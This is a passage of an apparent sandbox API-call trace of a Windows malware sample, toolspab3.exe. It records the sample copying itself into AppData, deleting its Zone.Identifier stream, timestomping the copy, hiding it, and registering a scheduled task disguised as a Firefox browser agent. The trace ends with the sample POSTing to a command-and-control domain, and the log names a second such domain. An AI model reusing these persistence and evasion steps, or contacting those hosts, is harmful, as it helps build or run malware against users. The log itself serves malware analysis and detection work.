Size=0xe) returned 0x440830 [0151.592] wsprintfA (in: param_1=0x410dbe, param_2="%sFF" | out: param_1="FE7F15060B875FB9FB2A49F08D5D03120C287F38FF") returned 42 [0151.592] RtlSizeHeap (HeapHandle=0x440000, Flags=0x0, MemoryPointer=0x440830) returned 0xe [0151.592] RtlFreeHeap (HeapHandle=0x440000, Flags=0x0, BaseAddress=0x440830) returned 1 [0151.592] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="FE7F15060B875FB9FB2A49F08D5D03120C287F38") returned 0x202c [0151.592] RtlGetLastWin32Error () returned 0x0 [0151.592] GetTickCount () returned 0xdfd0e0 [0151.592] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x1008) returned 0x440830 [0151.592] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x2e) returned 0x441840 [0151.592] RegOpenKeyExA (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x10cdfed8 | out: phkResult=0x10cdfed8*=0x1e4c) returned 0x0 [0151.592] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x14) returned 0x441880 [0151.592] RegQueryValueExA (in: hKey=0x1e4c, lpValueName="svcVersion", lpReserved=0x0, lpType=0x0, lpData=0x10cdfe60, lpcbData=0x10cdfec0*=0x20 | out: lpType=0x0, lpData=0x10cdfe60*=0x31, lpcbData=0x10cdfec0*=0xd) returned 0x0 [0151.592] RtlSizeHeap (HeapHandle=0x440000, Flags=0x0, MemoryPointer=0x441880) returned 0x14 [0151.592] RtlFreeHeap (HeapHandle=0x440000, Flags=0x0, BaseAddress=0x441880) returned 1 [0151.592] lstrlenA (lpString="11.0.10586.0") returned 12 [0151.592] lstrlenA (lpString=".") returned 1 [0151.592] atoi (_Str="11") returned 11 [0151.592] RegCloseKey (hKey=0x1e4c) returned 0x0 [0151.592] RtlSizeHeap (HeapHandle=0x440000, Flags=0x0, MemoryPointer=0x441840) returned 0x2e [0151.592] RtlFreeHeap (HeapHandle=0x440000, Flags=0x0, BaseAddress=0x441840) returned 1 [0151.593] ObtainUserAgentString (in: dwOption=0xb, pszUAOut=0x440830, cbSize=0x10cdfec0 | out: pszUAOut="Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko", cbSize=0x10cdfec0) returned 0x0 [0151.627] lstrlenA (lpString="Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko") returned 74 [0151.627] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x440830, cbMultiByte=75, lpWideCharStr=0x410577, cchWideChar=150 | out: lpWideCharStr="Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko") returned 75 [0151.627] RtlSizeHeap (HeapHandle=0x440000, Flags=0x0, MemoryPointer=0x440830) returned 0x1008 [0151.627] RtlFreeHeap (HeapHandle=0x440000, Flags=0x0, BaseAddress=0x440830) returned 1 [0151.627] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x1008) returned 0x440830 [0151.627] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x1c) returned 0x441840 [0151.627] ExpandEnvironmentStringsW (in: lpSrc="%APPDATA%", lpDst=0x440830, nSize=0x105 | out: lpDst="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x26 [0151.627] RtlSizeHeap (HeapHandle=0x440000, Flags=0x0, MemoryPointer=0x441840) returned 0x1c [0151.627] RtlFreeHeap (HeapHandle=0x440000, Flags=0x0, BaseAddress=0x441840) returned 1 [0151.627] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x16) returned 0x441840 [0151.627] wsprintfW (in: param_1=0x4107a6, param_2="%s\\%hs" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\bcatcih") returned 45 [0151.627] wsprintfW (in: param_1=0x410bb6, param_2="%s\\%hs" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\wvhwbfa") returned 45 [0151.627] RtlSizeHeap (HeapHandle=0x440000, Flags=0x0, MemoryPointer=0x441840) returned 0x16 [0151.627] RtlFreeHeap (HeapHandle=0x440000, Flags=0x0, BaseAddress=0x441840) returned 1 [0151.627] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x26) returned 0x441840 [0151.627] lstrlenA (lpString="http://file-coin-host-12.com/") returned 29 [0151.627] RtlComputeCrc32 (PartialCrc=0x0, Buffer=0x441840, Length=0x1d) returned 0x57488b3e [0151.627] RtlSizeHeap (HeapHandle=0x440000, Flags=0x0, MemoryPointer=0x441840) returned 0x26 [0151.627] RtlFreeHeap (HeapHandle=0x440000, Flags=0x0, BaseAddress=0x441840) returned 1 [0151.628] lstrcmpW (lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\toolspab3.exe", lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\bcatcih") returned 1 [0151.628] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\bcatcih" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\bcatcih")) returned 0 [0151.628] CopyFileW (lpExistingFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\toolspab3.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\toolspab3.exe"), lpNewFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\bcatcih" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\bcatcih"), bFailIfExists=0) returned 1 [0152.215] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\toolspab3.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\toolspab3.exe")) returned 1 [0152.258] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x12) returned 0x441840 [0152.258] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x2a) returned 0x441860 [0152.258] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x408) returned 0x4418a0 [0152.258] wsprintfW (in: param_1=0x4418a0, param_2="%s%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\bcatcih:Zone.Identifier") returned 61 [0152.258] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\bcatcih:Zone.Identifier" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\bcatcih:zone.identifier")) returned 0 [0152.258] RtlSizeHeap (HeapHandle=0x440000, Flags=0x0, MemoryPointer=0x4418a0) returned 0x408 [0152.258] RtlFreeHeap (HeapHandle=0x440000, Flags=0x0, BaseAddress=0x4418a0) returned 1 [0152.258] RtlSizeHeap (HeapHandle=0x440000, Flags=0x0, MemoryPointer=0x441840) returned 0x12 [0152.258] RtlFreeHeap (HeapHandle=0x440000, Flags=0x0, BaseAddress=0x441840) returned 1 [0152.258] RtlSizeHeap (HeapHandle=0x440000, Flags=0x0, MemoryPointer=0x441860) returned 0x2a [0152.258] RtlFreeHeap (HeapHandle=0x440000, Flags=0x0, BaseAddress=0x441860) returned 1 [0152.258] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x16) returned 0x441840 [0152.258] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x210) returned 0x441860 [0152.258] GetSystemDirectoryA (in: lpBuffer=0x441860, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0152.258] lstrcatA (in: lpString1="C:\\Windows\\system32", lpString2="\\" | out: lpString1="C:\\Windows\\system32\\") returned="C:\\Windows\\system32\\" [0152.258] lstrcatA (in: lpString1="C:\\Windows\\system32\\", lpString2="advapi32.dll" | out: lpString1="C:\\Windows\\system32\\advapi32.dll") returned="C:\\Windows\\system32\\advapi32.dll" [0152.258] SetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\bcatcih", dwFileAttributes=0x6) returned 1 [0152.259] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\bcatcih" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\bcatcih"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0x172c [0152.259] GetFileAttributesExA (in: lpFileName="C:\\Windows\\system32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll"), fInfoLevelId=0x0, lpFileInformation=0x10cdfe30 | out: lpFileInformation=0x10cdfe30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a16bf4b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1a16bf4b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1a16bf4b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xa3ef0)) returned 1 [0152.259] SetFileTime (hFile=0x172c, lpCreationTime=0x10cdfe34, lpLastAccessTime=0x10cdfe3c, lpLastWriteTime=0x10cdfe44) returned 1 [0152.259] CloseHandle (hObject=0x172c) returned 1 [0152.259] RtlSizeHeap (HeapHandle=0x440000, Flags=0x0, MemoryPointer=0x441860) returned 0x210 [0152.259] RtlFreeHeap (HeapHandle=0x440000, Flags=0x0, BaseAddress=0x441860) returned 1 [0152.259] RtlSizeHeap (HeapHandle=0x440000, Flags=0x0, MemoryPointer=0x441840) returned 0x16 [0152.259] RtlFreeHeap (HeapHandle=0x440000, Flags=0x0, BaseAddress=0x441840) returned 1 [0152.259] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x418) returned 0x441840 [0152.259] lstrcatW (in: lpString1="", lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\bcatcih" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\bcatcih") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\bcatcih" [0152.259] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x212) returned 0x441c60 [0152.259] GetUserNameW (in: lpBuffer=0x441c60, pcbBuffer=0x10cdfe70 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x10cdfe70) returned 1 [0152.262] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x10d) returned 0x441e80 [0152.262] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x4c) returned 0x441fa0 [0152.263] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x10d) returned 0x442000 [0152.263] wsprintfW (in: param_1=0x441e80, param_2="Firefox Default Browser Agent %hs" | out: param_1="Firefox Default Browser Agent FE7F15060B875FB9") returned 46 [0152.263] RtlSizeHeap (HeapHandle=0x440000, Flags=0x0, MemoryPointer=0x442000) returned 0x10d [0152.263] RtlFreeHeap (HeapHandle=0x440000, Flags=0x0, BaseAddress=0x442000) returned 1 [0152.263] RtlSizeHeap (HeapHandle=0x440000, Flags=0x0, MemoryPointer=0x441fa0) returned 0x4c [0152.263] RtlFreeHeap (HeapHandle=0x440000, Flags=0x0, BaseAddress=0x441fa0) returned 1 [0152.263] CoCreateInstance (in: rclsid=0x421010*(Data1=0xf87369f, Data2=0xa4e5, Data3=0x4cfc, Data4=([0]=0xbd, [1]=0x3e, [2]=0x73, [3]=0xe6, [4]=0x15, [5]=0x45, [6]=0x72, [7]=0xdd)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x421000*(Data1=0x2faba4c7, Data2=0x4da9, Data3=0x4013, Data4=([0]=0x96, [1]=0x97, [2]=0x20, [3]=0xcc, [4]=0x3f, [5]=0xd4, [6]=0xf, [7]=0x85)), ppv=0x10cdfd08 | out: ppv=0x10cdfd08*=0x3cc33f0) returned 0x0 [0152.545] TaskScheduler:ITaskService:Connect (This=0x3cc33f0, serverName=0x10cdfd80*(varType=0x0, wReserved1=0x44, wReserved2=0x0, wReserved3=0x0, varVal1=0x425257, varVal2=0x4107a6), user=0x10cdfda0*(varType=0x0, wReserved1=0x44, wReserved2=0x0, wReserved3=0x0, varVal1=0x425257, varVal2=0x4107a6), domain=0x10cdfd60*(varType=0x0, wReserved1=0x44, wReserved2=0x0, wReserved3=0x0, varVal1=0x425257, varVal2=0x4107a6), password=0x10cdfde0*(varType=0x0, wReserved1=0x44, wReserved2=0x0, wReserved3=0x0, varVal1=0x425257, varVal2=0x4107a6)) returned 0x0 [0152.569] TaskScheduler:ITaskService:GetFolder (in: This=0x3cc33f0, Path="", ppFolder=0x10cdfd28 | out: ppFolder=0x10cdfd28*=0x3d4b840) returned 0x0 [0152.571] ITaskFolder:DeleteTask (This=0x3d4b840, Name="Firefox Default Browser Agent FE7F15060B875FB9", flags=0) returned 0x80070002 [0152.572] TaskScheduler:ITaskService:NewTask (in: This=0x3cc33f0, flags=0x0, ppDefinition=0x10cdfe40 | out: ppDefinition=0x10cdfe40*=0x3d48c90) returned 0x0 [0152.573] ITaskDefinition:get_RegistrationInfo (in: This=0x3d48c90, ppRegistrationInfo=0x10cdfd40 | out: ppRegistrationInfo=0x10cdfd40*=0x3ced7e0) returned 0x0 [0152.573] IRegistrationInfo:put_Author (This=0x3ced7e0, Author="RDhJ0CNFevzX") returned 0x0 [0152.573] IUnknown:Release (This=0x3ced7e0) returned 0x1 [0152.573] ITaskDefinition:get_Settings (in: This=0x3d48c90, ppSettings=0x10cdfd18 | out: ppSettings=0x10cdfd18*=0x3ced420) returned 0x0 [0152.573] ITaskSettings:put_StartWhenAvailable (This=0x3ced420, StartWhenAvailable=1) returned 0x0 [0152.573] IUnknown:Release (This=0x3ced420) returned 0x3 [0152.573] ITaskDefinition:get_Triggers (in: This=0x3d48c90, ppTriggers=0x10cdfd20 | out: ppTriggers=0x10cdfd20*=0x3cfeb00) returned 0x0 [0152.573] ITriggerCollection:Create (in: This=0x3cfeb00, Type=1, ppTrigger=0x10cdfe30 | out: ppTrigger=0x10cdfe30*=0x3d48db0) returned 0x0 [0152.573] IUnknown:QueryInterface (in: This=0x3d48db0, riid=0x421030*(Data1=0xb45747e0, Data2=0xeba7, Data3=0x4276, Data4=([0]=0x9f, [1]=0x29, [2]=0x85, [3]=0xc5, [4]=0xbb, [5]=0x30, [6]=0x0, [7]=0x6)), ppvObject=0x10cdfd10 | out: ppvObject=0x10cdfd10*=0x3d48db0) returned 0x0 [0152.574] ITrigger:get_Repetition (in: This=0x3d48db0, ppRepeat=0x10cdfd00 | out: ppRepeat=0x10cdfd00*=0x3d57b60) returned 0x0 [0152.574] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x14) returned 0x441fa0 [0152.574] IRepetitionPattern:put_Interval (This=0x3d57b60, Interval="PT10M") returned 0x0 [0152.574] ITrigger:put_Repetition (This=0x3d48db0, Repetition=0x3d57b60) returned 0x0 [0152.574] IUnknown:Release (This=0x3d57b60) returned 0x1 [0152.574] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x30) returned 0x441fc0 [0152.574] ITrigger:put_StartBoundary (This=0x3d48db0, StartBoundary="1999-11-30T00:00:00") returned 0x0 [0152.574] IUnknown:Release (This=0x3d48db0) returned 0x2 [0152.574] RtlSizeHeap (HeapHandle=0x440000, Flags=0x0, MemoryPointer=0x441fc0) returned 0x30 [0152.574] RtlFreeHeap (HeapHandle=0x440000, Flags=0x0, BaseAddress=0x441fc0) returned 1 [0152.574] RtlSizeHeap (HeapHandle=0x440000, Flags=0x0, MemoryPointer=0x441fa0) returned 0x14 [0152.574] RtlFreeHeap (HeapHandle=0x440000, Flags=0x0, BaseAddress=0x441fa0) returned 1 [0152.574] IUnknown:Release (This=0x3d48db0) returned 0x1 [0152.574] ITriggerCollection:Create (in: This=0x3cfeb00, Type=9, ppTrigger=0x10cdfe30 | out: ppTrigger=0x10cdfe30*=0x3cf9720) returned 0x0 [0152.575] IUnknown:QueryInterface (in: This=0x3cf9720, riid=0x421020*(Data1=0x72dade38, Data2=0xfae4, Data3=0x4b3e, Data4=([0]=0xba, [1]=0xf4, [2]=0x5d, [3]=0x0, [4]=0x9a, [5]=0xf0, [6]=0x2b, [7]=0x1c)), ppvObject=0x10cdfd00 | out: ppvObject=0x10cdfd00*=0x3cf9720) returned 0x0 [0152.575] ILogonTrigger:put_UserId (This=0x3cf9720, UserId="RDhJ0CNFevzX") returned 0x0 [0152.578] IUnknown:Release (This=0x3cf9720) returned 0x2 [0152.578] IUnknown:Release (This=0x3cf9720) returned 0x1 [0152.578] ITaskDefinition:get_Actions (in: This=0x3d48c90, ppActions=0x10cdfd30 | out: ppActions=0x10cdfd30*=0x3d4b640) returned 0x0 [0152.579] IActionCollection:Create (in: This=0x3d4b640, Type=0, ppAction=0x10cdfd48 | out: ppAction=0x10cdfd48*=0x3cfe710) returned 0x0 [0152.579] IUnknown:Release (This=0x3d4b640) returned 0x1 [0152.579] IUnknown:QueryInterface (in: This=0x3cfe710, riid=0x421040*(Data1=0x4c3d624d, Data2=0xfd6b, Data3=0x49a3, Data4=([0]=0xb9, [1]=0xb7, [2]=0x9, [3]=0xcb, [4]=0x3c, [5]=0xd3, [6]=0xf0, [7]=0x47)), ppvObject=0x10cdfd38 | out: ppvObject=0x10cdfd38*=0x3cfe710) returned 0x0 [0152.579] IExecAction:put_Path (This=0x3cfe710, Path="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\bcatcih") returned 0x0 [0152.579] IUnknown:Release (This=0x3cfe710) returned 0x2 [0152.579] ITaskFolder:RegisterTaskDefinition (in: This=0x3d4b840, Path="Firefox Default Browser Agent FE7F15060B875FB9", pDefinition=0x3d48c90, flags=6, UserId=0x10cdfd60*(varType=0x0, wReserved1=0x44, wReserved2=0x0, wReserved3=0x0, varVal1=0x425257, varVal2=0x4107a6), password=0x10cdfda0*(varType=0x0, wReserved1=0x44, wReserved2=0x0, wReserved3=0x0, varVal1=0x425257, varVal2=0x4107a6), LogonType=3, sddl=0x10cdfd80*(varType=0x0, wReserved1=0x44, wReserved2=0x0, wReserved3=0x0, varVal1=0x425257, varVal2=0x4107a6), ppTask=0x10cdfd00 | out: ppTask=0x10cdfd00*=0x3ced8a0) returned 0x0 [0153.333] IUnknown:Release (This=0x3cfe710) returned 0x1 [0153.333] IUnknown:Release (This=0x3cfeb00) returned 0x1 [0153.333] TaskScheduler:IUnknown:Release (This=0x3d48c90) returned 0x0 [0153.333] TaskScheduler:IUnknown:Release (This=0x3d4b840) returned 0x0 [0153.333] TaskScheduler:IUnknown:Release (This=0x3cc33f0) returned 0x0 [0153.333] RtlSizeHeap (HeapHandle=0x440000, Flags=0x0, MemoryPointer=0x441e80) returned 0x10d [0153.333] RtlFreeHeap (HeapHandle=0x440000, Flags=0x0, BaseAddress=0x441e80) returned 1 [0153.333] RtlSizeHeap (HeapHandle=0x440000, Flags=0x0, MemoryPointer=0x441840) returned 0x418 [0153.333] RtlFreeHeap (HeapHandle=0x440000, Flags=0x0, BaseAddress=0x441840) returned 1 [0153.333] RtlSizeHeap (HeapHandle=0x440000, Flags=0x0, MemoryPointer=0x441c60) returned 0x212 [0153.333] RtlFreeHeap (HeapHandle=0x440000, Flags=0x0, BaseAddress=0x441c60) returned 1 [0153.333] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\bcatcih" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\bcatcih"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x24e0 [0153.333] CreateFileMappingA (hFile=0x0, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xfa000, lpName="FE7F15060B875FB9FB2A49F08D5D03120C287F38FF") returned 0x24f4 [0153.333] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x26) returned 0x441840 [0153.334] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\wvhwbfa" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\wvhwbfa"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0153.334] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x18c53ed5 [0153.334] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x3d) returned 0x441870 [0153.334] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x6a19babb [0153.334] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x569a8c1c [0153.334] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x1e0db282 [0153.334] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xd92f51e4 [0153.334] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x42347e44 [0153.334] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xc457a1c9 [0153.334] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x7f86b724 [0153.334] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x4b56a3f7 [0153.334] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x1900adc3 [0153.334] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x9a433c4a [0153.334] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x16aa62b2 [0153.334] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x3a595e29 [0153.334] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x275169fb [0153.334] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xe5282388 [0153.334] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xe8293ff4 [0153.334] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x66e35604 [0153.334] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x7e46d897 [0153.334] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x417832e [0153.334] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xc2732658 [0153.334] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x9ffe199d [0153.334] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xae17abd8 [0153.334] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x255fc183 [0153.334] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xf7b37d58 [0153.334] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x2097b74f [0153.334] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x400b3de [0153.334] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x113391d7 [0153.334] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x5a86a298 [0153.334] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x9c284401 [0153.334] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xf22e085d [0153.334] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x92cd4703 [0153.334] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xfcc116a9 [0153.334] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x3227f763 [0153.334] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xf42b81a [0153.335] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x5a748bfe [0153.335] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x19bff040 [0153.335] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x2a002922 [0153.335] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x61d7ac5d [0153.335] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xddc75fac [0153.335] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x97373a0c [0153.335] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xdf341d8 [0153.335] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x48977783 [0153.335] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x50d4b33 [0153.335] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xf11645f6 [0153.335] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x31df53fc [0153.335] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xd7a600f9 [0153.335] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x4266289 [0153.335] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x38108552 [0153.335] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xe03ad267 [0153.335] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xd9cdbb0b [0153.335] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x43cb0e4d [0153.335] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xb9dc2f3 [0153.335] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xbe33c404 [0153.335] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x8c) returned 0x4418c0 [0153.335] lstrcatA (in: lpString1="", lpString2="FE7F15060B875FB9FB2A49F08D5D03120C287F38" | out: lpString1="FE7F15060B875FB9FB2A49F08D5D03120C287F38") returned="FE7F15060B875FB9FB2A49F08D5D03120C287F38" [0153.335] lstrcatA (in: lpString1="", lpString2="XC64ZB" | out: lpString1="XC64ZB") returned="XC64ZB" [0153.335] lstrcatA (in: lpString1="", lpString2="pub3" | out: lpString1="pub3") returned="pub3" [0153.335] lstrcatA (in: lpString1="", lpString2="foE3-l]\"$+3$H\"bbx;W$_hKRD5,Ao?pbvZAb,l=fMvSXCIkThlbl#]=i2.c>qkPAF?B[=)>#B-lx>#\\:qZn,>Z" | out: lpString1=".)*QH(*h:*)!((ir8*e.yW`ibah#i#qT\\bZi_H&sj\\^TW>'-=9!Tr*Hj,z]xFbyg\"vb?oFj:<8GqHTf/bVZ;]oz#j8TnDn-IhFb4:o=BYvXe]n@(5iv2*To;x:fwMI;'I9B\\(azq*=&[%0=5oxS=m]nW84WpUy^PD)p@wOs1=!TV:%FSP!@(kCX2u=L_cj&\\DUwd[U\"uIa=gAOl@v*\\M`]>$H\"bbx;W$_hKRD5,Ao?pbvZAb,l=fMvSXCIkThlbl#]=i2.c>qkPAF?B[=)>#B-lx>#\\:qZn,>Z") returned=".)*QH(*h:*)!((ir8*e.yW`ibah#i#qT\\bZi_H&sj\\^TW>'-=9!Tr*Hj,z]xFbyg\"vb?oFj:<8GqHTf/bVZ;]oz#j8TnDn-IhFb4:o=BYvXe]n@(5iv2*To;x:fwMI;'I9B\\(azq*=&[%0=5oxS=m]nW84WpUy^PD)p@wOs1=!TV:%FSP!@(kCX2u=L_cj&\\DUwd[U\"uIa=gAOl@v*\\M`]>$H\"bbx;W$_hKRD5,Ao?pbvZAb,l=fMvSXCIkThlbl#]=i2.c>qkPAF?B[=)>#B-lx>#\\:qZn,>Z" [0304.618] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x10c) returned 0x441b80 [0304.618] lstrlenA (lpString="http://host-data-coin-11.com/") returned 29 [0304.618] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x441840, cbMultiByte=30, lpWideCharStr=0x441b80, cchWideChar=60 | out: lpWideCharStr="http://host-data-coin-11.com/") returned 30 [0304.618] WinHttpGetIEProxyConfigForCurrentUser (in: pProxyConfig=0x10cdfc18 | out: pProxyConfig=0x10cdfc18) returned 1 [0304.670] WinHttpOpen (pszAgentW="Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko", dwAccessType=0x0, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0x4b3bd10 [0304.671] WinHttpCrackUrl (in: pwszUrl="http://host-data-coin-11.com/", dwUrlLength=0x0, dwFlags=0x0, lpUrlComponents=0x10cdfcd0 | out: lpUrlComponents=0x10cdfcd0) returned 1 [0304.671] WinHttpConnect (hSession=0x4b3bd10, pswzServerName="host-data-coin-11.com", nServerPort=0x50, dwReserved=0x0) returned 0x4cb2730 [0304.671] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x12) returned 0x441ca0 [0304.671] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x68) returned 0x441cc0 [0304.671] WinHttpOpenRequest (hConnect=0x4cb2730, pwszVerb="POST", pwszObjectName="/", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x0) returned 0x66e790 [0304.671] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x4e) returned 